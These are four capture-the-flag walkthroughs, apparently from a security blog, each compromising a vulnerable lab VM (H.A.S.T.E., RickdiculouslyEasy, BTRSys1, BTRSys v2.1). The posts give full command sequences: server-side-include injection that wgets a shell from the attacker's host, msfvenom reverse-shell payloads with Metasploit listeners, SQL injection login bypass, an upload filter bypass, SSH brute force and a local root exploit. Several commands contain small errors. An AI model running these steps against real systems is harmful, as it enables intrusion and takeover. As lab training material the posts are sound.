Hack the H.A.S.T.E. VM Challenge

Hello friends! Today we are going to take another CTF challenge known as ‘H.A.S.T.E.’. The credit for making this vm machine goes to “f1re_w1re” and it is a unique challenge as we just have to get a reverse shell just to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.102

We find port 80 is open, so we open the ip address in our browser.

We don’t find anything on the page so we use dirb for listing directories on the web server.

dirb http://192.168.1.102

Now when we open http://192.168.0.102/ssi we get a hint that the website maybe vulnerable to server side injection.

Now when we open http://192.168.0.102/index we find the code executed by the server.

Now we go back to http://192.168.0.102/ and use server side injection to execute our commands.

We executed ‘ls -al’ command to check if it is working, as u can see in the image below we successfully ran our command.

<!–##EXEC cmd=”ls -la” –>

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktp/shell.py

Now we upload our shell to the server using server side injection.

<!–##EXEC cmd=”wget http://192.168.0.107/shell.py” –>

After successfully uploading the shell we use server side injection to execute our payload.

<!–##EXEC cmd=”python shell.py” –>

We setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.0.107

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

As soon as we execute our payload we get reverse shell. The main objective of the challenge was to get a reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the RickdiculouslyEasy VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as RickdiculouslyEasy. The credit for making this vm machine goes to “Luke” and it is another capture the flag challenge. Our goal is to capture flags and get 130 points in total to complete the challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.107 as network IP; now using nmap lets find out open ports.

nmap -p- -A 192.168.1.107

By doing the nmap scan, we find that port 21, 80, 9090, 13337, 22222, 60000 is open. Our nmap scan also shows us anonymous login is available on ftp.

We enumerate the open ports further using netcat and found 2 flags.

nc 192.168.1.107 13337

nc 192.168.1.107 60000

We opened port 9090 in web browser and find third flag.

Now we use dirb to list the directories, as port 80 is open.

dirb http://192.168.1.107/

Using dirb we found a page http://192.168.1.107/passwords/. When we open it we find two files ‘flag.txt’ and ‘passwords.html’.

When we open ‘FLAG.txt’ file and we our 4th flag.

Now we open the passwords.html file. We can’t find anything on the page so we take a look at the source code of  the file, inside we find a password for some user.

Nmap  scan showed that ftp is vulnerable to anonymous login. So we login ftp using username and password as anonymous.

When we access ftp we get a file called FLAG.txt, we open it and find our 5th flag.

We open robots.txt and find link to two files root_shell.cgi and tracertool.cgi

http://192.168.1.107/cgi-bin/tracertoll.cgi is vulnerable to command injection.

We find that few commands have been filtered we use ‘more‘ command to get the name of the users in /etc/passwd file.

more /etc/passwd

Now we login using ssh using username Summer and password winter that we found earlier.

ssh -p 22222 [email protected]

After connecting to ssh we find a file called FLAG.txt and inside the file we find our 6th flag.

Now searching through the files we came across an image and zip file inside Morty/ directory. We download the files into our system through ssh.

scp Safe_Password.jpg [email protected]:/root/Desktop

scp journal.txt.zip [email protected]:/root/Desktop

After download the files we use strings command to find if something is hidden inside the image file, and we find the password for unzipping journal.txt.zip file

strings Safe_Passwords.jpg

After unzipping the zip file, we open the file and find our 7th flag.

Back at the target VM we find an executable file called ‘safe’ we try to run it but we don’t have permissions to run it. So we download the file to our system.

scp safe [email protected]:/root/Desktop

Now when we run the file it asks for argument. We use the string found inside the last flag(131333)and we get a hint for a password for user RickSanchez.

As the password contains 1 uppercase character, 1 digit followed by one of the word in the name of the band of Rick Sanchez. We use crunch to create a dictionary. We find that the name of the band in which rick played was called ‘the flesh curtains’.

crunch 10 10 -t ,%Curtains -o /root/Desktop/pass.txt

crunch 7 7 -t ,%Flesh –o /root/Desktop/pass1.txt

After creating the dictionary, we use dymerge tool to combine the both dictionary to form a single dictionary.

python dymerge.py /root/Desktop/pass.txt /root/Desktop/pass1.txt -s -o /root/Desktop/password.txt

Now that our dictionary is ready we bruteforce ssh using metasploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.107

msf auxiliary(ssh_login) > set rport 22222

msf auxiliary(ssh_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(ssh_login) > set username RickSanchez

msf auxiliary(ssh_login) > run

After successfully brute-forcing ssh, we spawn terminal using python.

echo "import pty; pty.spawn("/bin/bash")'

After spawning the terminal, we take a look at the sudoers list. We find that we have all the privileges of root.

We switch to root user then move to root folder. Inside the root folder we find a file called FLAG.txt, when we open the file we find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the BTRSys1 VM (Boot2Root Challenge)

BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.

Difficulty level: Beginner

WalkThrough

Let’s start with finding our target as always by using the following command:

netdiscover

Now as we know our target is 192.168.0.105. Let’s use nmap on it. We all know nmap has many type of scans but aggression scan is much better as it combine and gives all the information at once.

nmap -A 192.168.0.105

Through nmap we know that port 21, 22 and 80 are open with the services of FTP, SSH and HTTP respectively. As nmap hasn’t told us much; we shall dig deeper by using nikto. Nikto is open-source web server scanner which allows you look for dangerous files/programs, outdated versions, index files, http server options, etc. to use nikto type :

nikto -h http://192.168.0.105

With the help of nikto we know that there is login page à /login.php

Let’s go the login page by typing the following in URL:

192.168.0.105/login.php

So now we in on login page but we do not have credentials to log in. Let’s check its page source.

Now in the page source if you observe the function control carefully, you’ll realise that username ends with @btrisk.com so, therefore we can use SQL injection here and for that use the following steps:

Use bruteforce to apply SQL injection. (When asked for text file for bruteforce, select the one with the list of all sql injection commands)

After the completion of brute force it will give the correct sql code which will help you login as shown in above image.

 

Right click on that code and select ‘Show response in browser’ as shown above. This will open the browser and you will find yourself automatically logged in.

Login Details :  @btrisk.com   ‘ or “=’

As we are logged in, there is an option to upload a file. Here, we can upload our malicious php code. To generate the code go to the terminal of kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw

Copy the code from <?php to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.

When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burpsuite.

Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.

Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next we will use DIRB. And for that type:

dirb http://192.168.0.105

Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:

192.168.0.105/uploadsd/shell.php

Like always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.162.0.107

set lport 4444

exploit

After the handler is activated and your file is executed; you will have your meterpreter session. Let’s then further check system information and for that type:

sysinfo

Now that we have meterpreter session let’s explore a bit and look into html files:

cd /var/www/html

ls

There is a config.php file in var/www/html. This file has often proven to be important so let’s check it out.

cat config.php

Through config.php we know that one of the following words is a username and password :

root

toor

deneme

Let’s now go to shell and try to log in through these three keywords :

shell

mysql -uroot -p -Ddeneme

And then enter password toor

Once logged in let’s look for tables by using following command :

show tables;

As shown in above image there is table named user. Let’s see what this table has :

select * from user;

From the table we now know that password for root is asd123***. Let’s log in from it :

su root

asd123***

Let’s confirm our root access :

whoami

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

BTRSys is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for practice which has covered every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. And for that use the following command.

netdiscover

We know our target is 192.168.0.106 so, therefore, apply nmap on it as it will help us know which ports and services are open. Use the following command:

nmap -A 192.168.0.106

Due to nmap you can see that port 21, 22 and 80 are open with the service of FTP, SSH and HTTP respectively. As we still have a lot to find about this, we decided to use DIRB. Dirb is web-scanner i.e. it will scan the whole web application for file/directories. It will even show the hidden files. Use the following command:

dirb http://192.168.0.106

As you can see in the above image that using dirb we found various files and directories such as robots.txt, upload, etc. but you can also see that our target web application is using wordpress, so, we can easily apply a wordpress scan using the following command which covers themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ –enumerate at –enumerate ap –enumerate u

As a result we have found two users – btrisk and admin.

Now if you try to login through admin using password admin you have the access of the dashboard. And once you have that access you can execute a malicious PHP code there in to have a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you a php code which you have to execute. Copy the code from <?php to die(); and paste it in the template as shown below :

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. And to do so; go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 444

exploit

Once the handler is active and url is executed, you will have your session. Let’s check the system’s information which we have entered and for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through shell we came to know that Ubuntu’s version is 16.04.2 and fortunately there is exploit in exploit-db for this version of ubuntu. Download this exploit.

This exploit will help you to have achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it in the /tmp directory. For that you will need to go to /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now got o shell>/tmp and give the permission to the exploit rootshell and the execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

 

Related Posts Plugin for WordPress, Blogger...